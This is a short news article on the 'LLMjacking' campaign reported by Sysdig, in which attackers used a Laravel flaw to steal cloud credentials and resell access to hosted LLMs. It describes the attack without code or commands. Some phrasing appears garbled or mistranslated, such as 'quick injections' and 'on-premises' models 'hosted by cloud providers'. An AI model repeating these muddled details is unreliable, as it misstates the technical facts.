Using cloud-hosted large language models (LLMs) can be quite expensive, which is why hackers have apparently started stealing and selling login credentials for the tools.
Cybersecurity researchers Sysdig Threat Research Team recently detected one such campaign and named it LLMjacking.
In its report, Sysdig said it observed a threat actor abusing a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. This flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials for LLM services.
New methods of abuse
“Once they gained initial access, they extracted cloud credentials and gained access to the cloud environment, where they attempted to access on-premises LLM models hosted by cloud providers,” the researchers explained in the report. “In this case, the target was a local Claude LLM model (v2/v3) from Anthropic.”
The researchers were able to discover the tools that the attackers used to generate the requests that invoked the models. Among them was a Python script that checked the credentials of ten AI services and analyzed which one was useful. Services include AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.
They also found that the attackers did not run any legitimate LLM queries in the verification stage, but were instead doing “just enough” to figure out what the credentials and quotas were capable of.
In your news, Hacker News says the findings are evidence that hackers are finding new ways to weaponize LLMs, beyond the usual quick injections and model poisoning, by monetizing access to LLMs, while the bill is mailed to the victim.
The bill, investigators emphasized, could be quite large, reaching $46,000 per day for LLM use.
“Using LLM services can be expensive, depending on the model and the number of tokens supplied to it,” the researchers added. “By maximizing quota limits, attackers can also prevent the compromised organization from legitimately using models, disrupting business operations.”